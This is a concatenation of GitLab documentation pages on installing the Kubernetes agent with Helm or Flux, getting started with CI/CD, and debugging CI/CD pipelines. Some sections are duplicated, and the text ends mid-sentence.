`--reuse-values`. {{< /alert >}} To update the agent to the latest version, you can run: ```shell helm repo update helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent ``` To set a specific version, you can override the `image.tag` value. For example, to install version `v14.9.1`, run: ```shell helm upgrade gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent \ --set image.tag=v14.9.1 ``` The Helm chart is updated separately from the agent for Kubernetes, and might occasionally lag behind the latest version of the agent. If you run `helm repo update` and don't specify an image tag, your agent runs the version specified in the chart. To use the latest release of the agent for Kubernetes, set the image tag to match the most recent agent image. ## Uninstall the agent If you [installed the agent with Helm](#install-the-agent-with-helm), then you can also uninstall with Helm. For example, if the release and namespace are both called `gitlab-agent`, then you can uninstall the agent using the following command: ```shell helm uninstall gitlab-agent \ --namespace gitlab-agent ``` ## Troubleshooting When you install the agent for Kubernetes, you might encounter the following issues. ### Error: `failed to reconcile the GitLab Agent` If the `glab cluster agent bootstrap` command fails with the message `failed to reconcile the GitLab Agent`, it means `glab` couldn't reconcile the agent with Flux. This error might be because: - The Flux setup doesn't point to the directory where `glab` put the Flux manifests for the agent. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command. - Flux points to the root directory of a project without a `kustomization.yaml`, which causes Flux to traverse subdirectories looking for YAML files. To use the agent, you must have an agent configuration file at `.gitlab/agents/<agent-name>/config.yaml`, which is not a valid Kubernetes manifest. Flux fails to apply this file, which causes an error. To resolve, you should point Flux at a subdirectory instead of the root.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Installing the agent for Kubernetes breadcrumbs: - doc - user - clusters - agent - install --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} To connect a Kubernetes cluster to GitLab, you must install an agent in your cluster. ## Prerequisites Before you can install the agent in your cluster, you need: - An existing [Kubernetes cluster that you can connect to from your local terminal](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/). If you don't have a cluster, you can create one on a cloud provider, like: - [Amazon Elastic Kubernetes Service (EKS)](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html) - [Azure Kubernetes Service (AKS)](https://learn.microsoft.com/en-us/azure/aks/what-is-aks) - [Digital Ocean](https://docs.digitalocean.com/products/kubernetes/getting-started/quickstart/) - [Google Kubernetes Engine (GKE)](https://cloud.google.com/kubernetes-engine/docs/deploy-app-cluster) - You should use [Infrastructure as Code techniques](../../../infrastructure/iac/_index.md) for managing infrastructure resources at scale. - Access to an agent server: - On GitLab.com, the agent server is available at `wss://kas.gitlab.com`. - On GitLab Self-Managed, a GitLab administrator must set up the [agent server](../../../../administration/clusters/kas.md). Then it is available by default at `wss://gitlab.example.com/-/kubernetes-agent/`. - On GitLab Dedicated, the agent server is available at `wss://kas.<instance-domain>`, for example `wss://kas.example.gitlab-dedicated.com`. If you use a [custom hostname](../../../../administration/dedicated/configure_instance/network_security.md#bring-your-own-domain-byod) for your GitLab Dedicated instance, you can also choose a custom hostname for the KAS service. ## Bootstrap the agent with Flux support (recommended) You can install the agent by bootstrapping it with the [GitLab CLI (`glab`)](../../../../editor_extensions/gitlab_cli/_index.md) and Flux. Prerequisites: - You have the following command-line tools installed: - `glab` - `kubectl` - `flux` - You have a local cluster connection that works with `kubectl` and `flux`. - You [bootstrapped Flux](https://fluxcd.io/flux/installation/bootstrap/gitlab/) into the cluster with `flux bootstrap`. - Make sure to bootstrap Flux and the agent in compatible directories. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command. To install the agent, either: - Run `glab cluster agent bootstrap` within the directory of your Git repository of your target project: ```shell glab cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap> ``` - Run `glab -R path-with-namespace cluster agent bootstrap` if you must run the command outside of the Git repo of your target project: ```shell glab -R <full/path/to/project> cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap> ``` By default, the command: 1. Registers the agent. 1. Configures the agent. 1. Configures an environment with a dashboard for the agent. 1. Creates an agent token. 1. In the cluster, creates a Kubernetes secret with the agent token. 1. Commits the Flux Helm resources to the Git repository. 1. Triggers a Flux reconciliation. For customization options, run `glab cluster agent bootstrap --help`. You probably want to use at least the `--path <flux_manifests_directory>` option. ## Install the agent manually It takes three steps to install the agent in your cluster: 1. Optional. [Create an agent configuration file](#create-an-agent-configuration-file). 1. [Register the agent with GitLab](#register-the-agent-with-gitlab). 1. [Install the agent in your cluster](#install-the-agent-in-the-cluster). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Watch a [walk-through of this process](https://www.youtube.com/watch?v=XuBpKtsgGkE). <!-- Video published on 2021-09-02 --> ### Create an agent configuration file For configuration settings, the agent uses a YAML file in the GitLab project. Adding an agent configuration file is optional. You must create this file if: - You use [a GitLab CI/CD workflow](../ci_cd_workflow.md#use-gitlab-cicd-with-your-cluster) and want to authorize a different project or group to access the agent. - You [allow specific project or group members to access Kubernetes](../user_access.md). To create an agent configuration file: 1. Choose a name for your agent. The agent name follows the [DNS label standard from RFC 1123](https://www.rfc-editor.org/rfc/rfc1123). The name must: - Be unique in the project. - Contain at most 63 characters. - Contain only lowercase alphanumeric characters or `-`. - Start with an alphanumeric character. - End with an alphanumeric character. 1. In the repository, in the default branch, create an agent configuration file at: ```plaintext .gitlab/agents/<agent-name>/config.yaml ``` You can leave the file blank for now, and [configure it](../work_with_agent.md#configure-your-agent) later. ### Register the agent with GitLab #### Option 1: Agent connects to GitLab You can create a new agent record directly from the GitLab UI. The agent can be registered without creating an agent configuration file. You must register an agent before you can install the agent in your cluster. To register an agent: 1. On the left sidebar, select **Search or go to** and find your project. If you have an [agent configuration file](#create-an-agent-configuration-file), it must be in this project. Your cluster manifest files should also be in this project. 1. Select **Operate > Kubernetes clusters**. 1. Select **Connect a cluster (agent)**. 1. In the **Name of new agent** field, enter a unique name for your agent. - If an [agent configuration file](#create-an-agent-configuration-file) with this name already exists, it is used. - If no configuration exists for this name, a new agent is created with the default configuration. 1. Select **Create and register**. 1. GitLab generates an access token for the agent. You need this token to install the agent in your cluster. {{< alert type="warning" >}} Securely store the agent access token. A bad actor can use this token to access source code in the agent's configuration project, access source code in any public project on the GitLab instance, or even, under very specific conditions, obtain a Kubernetes manifest. {{< /alert >}} 1. Copy the command under **Recommended installation method**. You need it when you use the one-liner installation method to install the agent in your cluster. #### Option 2: GitLab connects to agent (receptive agent) {{< details >}} - Tier: Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4. {{< /history >}} {{< alert type="note" >}} The GitLab Agent Helm Chart release does not fully support mTLS authentication. You should authenticate with the JWT method instead. Support for mTLS is tracked in [issue 64](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/issues/64). {{< /alert >}} [Receptive agents](../_index.md#receptive-agents) allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab. 1. Follow the steps in option 1 to register an agent in your cluster. Save the agent token and install command for later, but don't install the agent yet. 1. Prepare an authentication method. The GitLab-to-agent connection can be cleartext gRPC (`grpc://`) or encrypted gRPC (`grpcs://`, recommended). GitLab can authenticate to the agent in your cluster using: - A JWT token. Available in both `grpc://` and `grpcs://` configurations. You don't need to generate client certificates with this method. 1. Add a URL configuration to the agent with the [cluster agents API](../../../../api/cluster_agents.md#create-an-agent-url-configuration). If you delete the URL configuration, the receptive agent becomes an ordinary agent. You can associate a receptive agent with only one URL configuration at a time. 1. Install the agent into the cluster. Use the command you copied when you registered the agent, but remove the `--set config.kasAddress=...` parameter. JWT token authentication example. Note the added `config.receptive.enabled=true` and `config.api.jwt` settings: ```shell helm repo add gitlab https://charts.gitlab.io helm repo update helm upgrade --install my-agent gitlab/gitlab-agent \ --namespace ns \ --create-namespace \ --set config.token=.... \ --set config.receptive.enabled=true \ --set config.api.jwtPublicKey=<public_key from the response> ``` It might take up to 10 minutes for GitLab to start trying to establish a connection to the new agent. ### Install the agent in the cluster To connect your cluster to GitLab, [install the registered agent with Helm](#install-the-agent-with-helm). To install a receptive agent, follow the steps in [GitLab connects to agent (receptive agent)](#option-2-gitlab-connects-to-agent-receptive-agent). {{< alert type="note" >}} To connect to multiple clusters, you must configure, register, and install an agent in each cluster. Make sure to give each agent a unique name. {{< /alert >}} #### Install the agent with Helm {{< alert type="warning" >}} For simplicity, the default Helm chart configuration sets up a service account for the agent with `cluster-admin` rights. You should not use this on production systems. To deploy to a production system, follow the instructions in [Customize the Helm installation](#customize-the-helm-installation) to create a service account with the minimum permissions required for your deployment and specify that during installation. {{< /alert >}} To install the agent on your cluster using Helm: 1. [Install the Helm CLI](https://helm.sh/docs/intro/install/). 1. In your computer, open a terminal and [connect to your cluster](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/). 1. Run the command you copied when you [registered your agent with GitLab](#register-the-agent-with-gitlab). The command should look like: ```shell helm repo add gitlab https://charts.gitlab.io helm repo update helm upgrade --install test gitlab/gitlab-agent \ --namespace gitlab-agent-test \ --create-namespace \ --set image.tag=<current agentk version> \ --set config.token=<your_token> \ --set config.kasAddress=<address_to_GitLab_KAS_instance> ``` 1. Optional. [Customize the Helm installation](#customize-the-helm-installation). If you install the agent on a production system, you should customize the Helm installation to restrict the permissions of the service account. Related customization options are described below. ##### Customize the Helm installation By default, the Helm installation command generated by GitLab: - Creates a namespace `gitlab-agent` for the deployment (`--namespace gitlab-agent`). You can skip creating the namespace by omitting the `--create-namespace` flag. - Sets up a service account for the agent and assigns it the `cluster-admin` role. You can: - Skip creating the service account by adding `--set serviceAccount.create=false` to the `helm install` command. In this case, you must set `serviceAccount.name` to a pre-existing service account. - Customise the role assigned to the service account by adding `--set rbac.useExistingRole <your role name>` to the `helm install` command. In this case, you should have a pre-created role with restricted permissions that can be used by the service account. - Skip role assignment altogether by adding `--set rbac.create=false` to your `helm install` command. In this case, you must create `ClusterRoleBinding` manually. - Creates a `Secret` resource for the agent's access token. To instead bring your own secret with a token, omit the token (`--set token=...`) and instead use `--set config.secretName=<your secret name>`. - Creates a `Deployment` resource for the `agentk` pod. To see the full list of customizations available, see the Helm chart's [README](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/blob/main/README.md#values). ##### Use the agent when KAS is behind a self-signed certificate When [KAS](../../../../administration/clusters/kas.md) is behind a self-signed certificate, you can set the value of `config.kasCaCert` to the certificate. For example: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --set-file config.kasCaCert=my-custom-ca.pem ``` In this example, `my-custom-ca.pem` is the path to a local file that contains the CA certificate used by KAS. The certificate is automatically stored in a config map and mounted in the `agentk` pod. If KAS is installed with the GitLab chart, and the chart is configured to provide an [auto-generated self-signed wildcard certificate](https://docs.gitlab.com/charts/installation/tls.html#option-4-use-auto-generated-self-signed-wildcard-certificate), you can extract the CA certificate from the `RELEASE-wildcard-tls-ca` secret. ##### Use the agent behind an HTTP proxy {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/351867) in GitLab 15.0, the GitLab agent Helm chart supports setting environment variables. {{< /history >}} To configure an HTTP proxy when using the Helm chart, you can use the environment variables `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`. Upper and lowercase are both acceptable. You can set these variables by using the `extraEnv` value, as a list of objects with keys `name` and `value`. For example, to set only the environment variable `HTTPS_PROXY` to the value `https://example.com/proxy`, you can run: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --set extraEnv[0].name=HTTPS_PROXY \ --set extraEnv[0].value=https://example.com/proxy \ ... ``` {{< alert type="note" >}} DNS rebind protection is disabled when either the `HTTP_PROXY` or the `HTTPS_PROXY` environment variable is set, and the domain DNS can't be resolved. {{< /alert >}} ## Install multiple agents in your cluster {{< alert type="note" >}} In most cases, you should run one agent per cluster and use the agent impersonation features (Premium and Ultimate only) to support multi-tenancy. If you must run multiple agents, we would love to hear from you about any issues you encounter. You can provide your feedback in [issue 454110](https://gitlab.com/gitlab-org/gitlab/-/issues/454110). {{< /alert >}} To install a second agent in your cluster, you can follow the [previous steps](#register-the-agent-with-gitlab) a second time. To avoid resource name collisions within the cluster, you must either: - Use a different release name for the agent, for example, `second-gitlab-agent`: ```shell helm upgrade --install second-gitlab-agent gitlab/gitlab-agent ... ``` - Or, install the agent in a different namespace, for example, `different-namespace`: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --namespace different-namespace \ ... ``` Because each agent in a cluster runs independently, reconciliations are triggered by every agent with the Flux module enabled. [Issue 357516](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) proposes to change this behavior. As a workaround, you can: - Configure RBAC with the agent so that it only accesses the Flux resources it needs. - Disable the Flux module on the agents that don't use it. ## Example projects The following example projects can help you get started with the agent. - [Distinct application and manifest repository example](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service-gitops) - [Auto DevOps setup that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service) - [Cluster management project template example that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/cluster-management) ## Updates and version compatibility GitLab warns you on the agent's list page to update the agent version installed on your cluster. For the best experience, the version of the agent installed in your cluster should match the GitLab major and minor version. The previous and next minor versions are also supported. For example, if your GitLab version is v14.9.4 (major version 14, minor version 9), then versions v14.9.0 and v14.9.1 of the agent are ideal, but any v14.8.x or v14.10.x version of the agent is also supported. See [the release page](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/releases) of the GitLab agent for Kubernetes. ### Update the agent version {{< alert type="note" >}} Instead of using `--reuse-values`, you should specify all needed values. If you use `--reuse-values`, you might miss new defaults or use deprecated values. To retrieve previous `--set` arguments, use `helm get values <release name>`. You can save the values to a file with `helm get values gitlab-agent > agent.yaml`, and pass the file to Helm with `-f`: `helm upgrade gitlab-agent gitlab/gitlab-agent -f agent.yaml`. This safely replaces the behavior of `--reuse-values`. {{< /alert >}} To update the agent to the latest version, you can run: ```shell helm repo update helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent ``` To set a specific version, you can override the `image.tag` value. For example, to install version `v14.9.1`, run: ```shell helm upgrade gitlab-agent gitlab/gitlab-agent \ --namespace gitlab-agent \ --set image.tag=v14.9.1 ``` The Helm chart is updated separately from the agent for Kubernetes, and might occasionally lag behind the latest version of the agent. If you run `helm repo update` and don't specify an image tag, your agent runs the version specified in the chart. To use the latest release of the agent for Kubernetes, set the image tag to match the most recent agent image. ## Uninstall the agent If you [installed the agent with Helm](#install-the-agent-with-helm), then you can also uninstall with Helm. For example, if the release and namespace are both called `gitlab-agent`, then you can uninstall the agent using the following command: ```shell helm uninstall gitlab-agent \ --namespace gitlab-agent ``` ## Troubleshooting When you install the agent for Kubernetes, you might encounter the following issues. ### Error: `failed to reconcile the GitLab Agent` If the `glab cluster agent bootstrap` command fails with the message `failed to reconcile the GitLab Agent`, it means `glab` couldn't reconcile the agent with Flux. This error might be because: - The Flux setup doesn't point to the directory where `glab` put the Flux manifests for the agent. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command. - Flux points to the root directory of a project without a `kustomization.yaml`, which causes Flux to traverse subdirectories looking for YAML files. To use the agent, you must have an agent configuration file at `.gitlab/agents/<agent-name>/config.yaml`, which is not a valid Kubernetes manifest. Flux fails to apply this file, which causes an error. To resolve, you should point Flux at a subdirectory instead of the root.
https://docs.gitlab.com/ci
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/_index.md
2025-08-13
doc/ci
[ "doc", "ci" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Get started with GitLab CI/CD
Build and test your application.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD is a continuous method of software development, where you continuously build, test, deploy, and monitor iterative code changes. This iterative process helps reduce the chance that you develop new code based on buggy or failed previous versions. GitLab CI/CD can catch bugs early in the development cycle, and help ensure that the code deployed to production complies with your established code standards. This process is part of a larger workflow: ![GitLab DevSecOps lifecycle with stages for Plan, Create, Verify, Secure, Release, and Monitor.](img/get_started_cicd_v16_11.png) ## Step 1: Create a `.gitlab-ci.yml` file To use GitLab CI/CD, you start with a `.gitlab-ci.yml` file at the root of your project. This file specifies the stages, jobs, and scripts to be executed during your CI/CD pipeline. It is a YAML file with its own custom syntax. In this file, you define variables, dependencies between jobs, and specify when and how each job should be executed. You can name this file anything you want, but `.gitlab-ci.yml` is the most common name, and the product documentation refers to it as the `.gitlab-ci.yml` file or the CI/CD configuration file. For more information, see: - [Tutorial: Create your first `.gitlab-ci.yml` file](quick_start/_index.md) - [The CI/CD YAML syntax reference](yaml/_index.md), which lists all possible keywords - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Integration overview](https://www.youtube-nocookie.com/embed/eyr5YnkWq_I) - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Delivery overview](https://www.youtube-nocookie.com/embed/M7rBDZYsx8U) - [Basics of CI blog](https://about.gitlab.com/blog/2020/12/10/basics-of-gitlab-ci-updated/) ## Step 2: Find or create runners Runners are the agents that run your jobs. These agents can run on physical machines or virtual instances. In your `.gitlab-ci.yml` file, you can specify a container image you want to use when running the job. The runner loads the image, clones your project, and runs the job either locally or in the container. If you use GitLab.com, runners on Linux, Windows, and macOS are already available for use. And you can register your own runners on GitLab.com if you'd like. If you don't use GitLab.com, you can: - Register runners or use runners already registered for your GitLab Self-Managed instance. - Create a runner on your local machine. For more information, see: - [Create a runner on your local machine](../tutorials/create_register_first_runner/_index.md) - [More information about runners](https://docs.gitlab.com/runner/) ## Step 3: Define your pipelines A pipeline is what you're defining in the `.gitlab-ci.yml` file, and is what happens when the contents of the file are run on a runner. Pipelines are made up of jobs and stages: - Stages define the order of execution. Typical stages might be `build`, `test`, and `deploy`. - Jobs specify the tasks to be performed in each stage. For example, a job can compile or test code. Pipelines can be triggered by various events, like commits or merges, or can be on schedule. In your pipeline, you can integrate with a wide range of tools and platforms. For more information, see: - [Pipeline editor](pipeline_editor/_index.md), which you use to edit your configuration - [Visualize your pipeline](pipeline_editor/_index.md#visualize-ci-configuration) - [Pipelines](pipelines/_index.md) ## Step 4: Use CI/CD variables as part of jobs GitLab CI/CD variables are key-value pairs you use to store and pass configuration settings and sensitive information, like passwords or API keys, to jobs in a pipeline. Use CI/CD variables to customize jobs by making values defined elsewhere accessible to jobs. You can hard-code CI/CD variables in your `.gitlab-ci.yml` file, set them in your project settings, or generate them dynamically. You can define them for the project, group, or instance. Two types of variables exist: custom variables and predefined. - Custom variables are user-defined. Create and manage them in the GitLab UI, API, or in configuration files. - Predefined variables are automatically set by GitLab and provide information about the current job, pipeline, and environment. Variables can be marked as "protected" or "masked" for added security. - Protected variables are only available to jobs running on protected branches or tags. - Masked variables have their values hidden in job logs to prevent sensitive information from being exposed. For more information, see: - [CI/CD variables](variables/_index.md) - [Dynamically generated predefined variables](variables/predefined_variables.md) ## Step 5: Use CI/CD components A CI/CD component is a reusable pipeline configuration unit. Use a CI/CD component to compose an entire pipeline configuration or a small part of a larger pipeline. You can add a component to your pipeline configuration with `include:component`. Reusable components help reduce duplication, improve maintainability, and promote consistency across projects. Create a component project and publish it to the CI/CD Catalog to share your component across multiple projects. GitLab also has CI/CD component templates for common tasks and integrations. For more information, see: - [CI/CD components](components/_index.md)
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Build and test your application. title: Get started with GitLab CI/CD breadcrumbs: - doc - ci --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD is a continuous method of software development, where you continuously build, test, deploy, and monitor iterative code changes. This iterative process helps reduce the chance that you develop new code based on buggy or failed previous versions. GitLab CI/CD can catch bugs early in the development cycle, and help ensure that the code deployed to production complies with your established code standards. This process is part of a larger workflow: ![GitLab DevSecOps lifecycle with stages for Plan, Create, Verify, Secure, Release, and Monitor.](img/get_started_cicd_v16_11.png) ## Step 1: Create a `.gitlab-ci.yml` file To use GitLab CI/CD, you start with a `.gitlab-ci.yml` file at the root of your project. This file specifies the stages, jobs, and scripts to be executed during your CI/CD pipeline. It is a YAML file with its own custom syntax. In this file, you define variables, dependencies between jobs, and specify when and how each job should be executed. You can name this file anything you want, but `.gitlab-ci.yml` is the most common name, and the product documentation refers to it as the `.gitlab-ci.yml` file or the CI/CD configuration file. For more information, see: - [Tutorial: Create your first `.gitlab-ci.yml` file](quick_start/_index.md) - [The CI/CD YAML syntax reference](yaml/_index.md), which lists all possible keywords - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Integration overview](https://www.youtube-nocookie.com/embed/eyr5YnkWq_I) - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [Continuous Delivery overview](https://www.youtube-nocookie.com/embed/M7rBDZYsx8U) - [Basics of CI blog](https://about.gitlab.com/blog/2020/12/10/basics-of-gitlab-ci-updated/) ## Step 2: Find or create runners Runners are the agents that run your jobs. These agents can run on physical machines or virtual instances. In your `.gitlab-ci.yml` file, you can specify a container image you want to use when running the job. The runner loads the image, clones your project, and runs the job either locally or in the container. If you use GitLab.com, runners on Linux, Windows, and macOS are already available for use. And you can register your own runners on GitLab.com if you'd like. If you don't use GitLab.com, you can: - Register runners or use runners already registered for your GitLab Self-Managed instance. - Create a runner on your local machine. For more information, see: - [Create a runner on your local machine](../tutorials/create_register_first_runner/_index.md) - [More information about runners](https://docs.gitlab.com/runner/) ## Step 3: Define your pipelines A pipeline is what you're defining in the `.gitlab-ci.yml` file, and is what happens when the contents of the file are run on a runner. Pipelines are made up of jobs and stages: - Stages define the order of execution. Typical stages might be `build`, `test`, and `deploy`. - Jobs specify the tasks to be performed in each stage. For example, a job can compile or test code. Pipelines can be triggered by various events, like commits or merges, or can be on schedule. In your pipeline, you can integrate with a wide range of tools and platforms. For more information, see: - [Pipeline editor](pipeline_editor/_index.md), which you use to edit your configuration - [Visualize your pipeline](pipeline_editor/_index.md#visualize-ci-configuration) - [Pipelines](pipelines/_index.md) ## Step 4: Use CI/CD variables as part of jobs GitLab CI/CD variables are key-value pairs you use to store and pass configuration settings and sensitive information, like passwords or API keys, to jobs in a pipeline. Use CI/CD variables to customize jobs by making values defined elsewhere accessible to jobs. You can hard-code CI/CD variables in your `.gitlab-ci.yml` file, set them in your project settings, or generate them dynamically. You can define them for the project, group, or instance. Two types of variables exist: custom variables and predefined. - Custom variables are user-defined. Create and manage them in the GitLab UI, API, or in configuration files. - Predefined variables are automatically set by GitLab and provide information about the current job, pipeline, and environment. Variables can be marked as "protected" or "masked" for added security. - Protected variables are only available to jobs running on protected branches or tags. - Masked variables have their values hidden in job logs to prevent sensitive information from being exposed. For more information, see: - [CI/CD variables](variables/_index.md) - [Dynamically generated predefined variables](variables/predefined_variables.md) ## Step 5: Use CI/CD components A CI/CD component is a reusable pipeline configuration unit. Use a CI/CD component to compose an entire pipeline configuration or a small part of a larger pipeline. You can add a component to your pipeline configuration with `include:component`. Reusable components help reduce duplication, improve maintainability, and promote consistency across projects. Create a component project and publish it to the CI/CD Catalog to share your component across multiple projects. GitLab also has CI/CD component templates for common tasks and integrations. For more information, see: - [CI/CD components](components/_index.md)
https://docs.gitlab.com/debugging
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/debugging.md
2025-08-13
doc/ci
[ "doc", "ci" ]
debugging.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Debugging CI/CD pipelines
Configuration validation, warnings, errors, and troubleshooting.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab provides several tools to help make it easier to debug your CI/CD configuration. If you are unable to resolve pipeline issues, you can get help from: - The [GitLab community forum](https://forum.gitlab.com/) - GitLab [Support](https://about.gitlab.com/support/) If you are having issues with a specific CI/CD feature, see the related troubleshooting section for that feature: - [Caching](caching/_index.md#troubleshooting). - [CI/CD job tokens](jobs/ci_job_token.md#troubleshooting). - [Container registry](../user/packages/container_registry/troubleshoot_container_registry.md). - [Docker](docker/docker_build_troubleshooting.md). - [Downstream pipelines](pipelines/downstream_pipelines_troubleshooting.md). - [Environments](environments/_index.md#troubleshooting). - [GitLab Runner](https://docs.gitlab.com/runner/faq/). - [ID tokens](secrets/id_token_authentication.md#troubleshooting). - [Jobs](jobs/job_troubleshooting.md). - [Job artifacts](jobs/job_artifacts_troubleshooting.md). - [Merge request pipelines](pipelines/mr_pipeline_troubleshooting.md), [merged results pipelines](pipelines/merged_results_pipelines.md#troubleshooting), and [merge trains](pipelines/merge_trains.md#troubleshooting). - [Pipeline editor](pipeline_editor/_index.md#troubleshooting). - [Variables](variables/variables_troubleshooting.md). - [YAML `includes` keyword](yaml/includes.md#troubleshooting). - [YAML `script` keyword](yaml/script_troubleshooting.md). ## Debugging techniques ### Verify syntax An early source of problems can be incorrect syntax. The pipeline shows a `yaml invalid` badge and does not start running if any syntax or formatting problems are found. #### Edit `.gitlab-ci.yml` with the pipeline editor The [pipeline editor](pipeline_editor/_index.md) is the recommended editing experience (rather than the single file editor or the Web IDE). It includes: - Code completion suggestions that ensure you are only using accepted keywords. - Automatic syntax highlighting and validation. - The [CI/CD configuration visualization](pipeline_editor/_index.md#visualize-ci-configuration), a graphical representation of your `.gitlab-ci.yml` file. #### Edit `.gitlab-ci.yml` locally If you prefer to edit your pipeline configuration locally, you can use the GitLab CI/CD schema in your editor to verify basic syntax issues. Any [editor with Schemastore support](https://www.schemastore.org/json/#editors) uses the GitLab CI/CD schema by default. If you need to link to the schema directly, use this URL: ```plaintext https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/editor/schema/ci.json ``` To see the full list of custom tags covered by the CI/CD schema, check the latest version of the schema. #### Verify syntax with CI Lint tool You can use the [CI Lint tool](yaml/lint.md) to verify that the syntax of a CI/CD configuration snippet is correct. Paste in full `.gitlab-ci.yml` files or individual job configurations, to verify the basic syntax. When a `.gitlab-ci.yml` file is present in a project, you can also use the CI Lint tool to [simulate the creation of a full pipeline](yaml/lint.md#simulate-a-pipeline). It does deeper verification of the configuration syntax. ### Use pipeline names Use [`workflow:name`](yaml/_index.md#workflowname) to give names to all your pipeline types, which makes it easier to identify pipelines in the pipelines list. For example: ```yaml variables: PIPELINE_NAME: "Default pipeline name" workflow: name: '$PIPELINE_NAME' rules: - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' variables: PIPELINE_NAME: "Merge request pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule" && $PIPELINE_SCHEDULE_TYPE == "hourly_deploy"' variables: PIPELINE_NAME: "Hourly deployment pipeline" - if: '$CI_PIPELINE_SOURCE == "schedule"' variables: PIPELINE_NAME: "Other scheduled pipeline" - if: '$CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH' variables: PIPELINE_NAME: "Default branch pipeline" - if: '$CI_COMMIT_BRANCH =~ /^\d{1,2}\.\d{1,2}-stable$/' variables: PIPELINE_NAME: "Stable branch pipeline" ``` ### CI/CD variables #### Verify variables A key part of troubleshooting CI/CD is to verify which variables are present in a pipeline, and what their values are. A lot of pipeline configuration is dependent on variables, and verifying them is one of the fastest ways to find the source of a problem. [Export the full list of variables](variables/variables_troubleshooting.md#list-all-variables) available in each problematic job. Check if the variables you expect are present, and check if their values are what you expect. #### Use variables to add flags to CLI commands You can define CI/CD variables that are not used in standard pipeline runs, but can be used for debugging on demand. If you add a variable like in the following example, you can add it during manual runs of the [pipeline](pipelines/_index.md#run-a-pipeline-manually) or [individual job](jobs/job_control.md#run-a-manual-job) to modify the command's behavior. For example: ```yaml my-flaky-job: variables: DEBUG_VARS: "" script: - my-test-command $DEBUG_VARS /test-dirs ``` In this example, `DEBUG_VARS` is blank by default in standard pipelines. If you need to debug the job's behavior, run the pipeline manually and set `DEBUG_VARS` to `--verbose` for additional output. ### Dependencies Dependency-related issues are another common source of unexpected issues in pipelines. #### Verify dependency versions To validate that the correct versions of dependencies are being used in jobs, you can output them before running the main script commands. For example: ```yaml job: before_script: - node --version - yarn --version script: - my-javascript-tests.sh ``` #### Pin versions While you might want to always use the latest version of a dependency or image, an update could include breaking changes unexpectedly. Consider pinning key dependencies and images to avoid surprise changes. For example: ```yaml variables: ALPINE_VERSION: '3.18.6' job1: image: alpine:$ALPINE_VERSION # This will never change unexpectedly script: - my-test-script.sh job2: image: alpine:latest # This might suddenly change script: - my-test-script.sh ``` You should still regularly check the dependency and image updates, as there might be important security updates. Then you can manually update the version as part of a process that verifies the updated image or dependency still works with your pipeline. ### Verify job output #### Make output verbose If you use `--silent` to reduce the amount of output in a job log, it can make it difficult to identify what went wrong in a job. Additionally, consider using `--verbose` when possible, for additional details. ```yaml job1: script: - my-test-tool --silent # If this fails, it might be impossible to identify the issue. - my-other-test-tool --verbose # This command will likely be easier to debug. ``` #### Save output and reports as artifacts Some tools might generate files that are only needed while the job is running, but the content of these files could be used for debugging. You can save them for later analysis with [`artifacts`](yaml/_index.md#artifacts): ```yaml job1: script: - my-tool --json-output my-output.json artifacts: paths: - my-output.json ``` Reports configured with 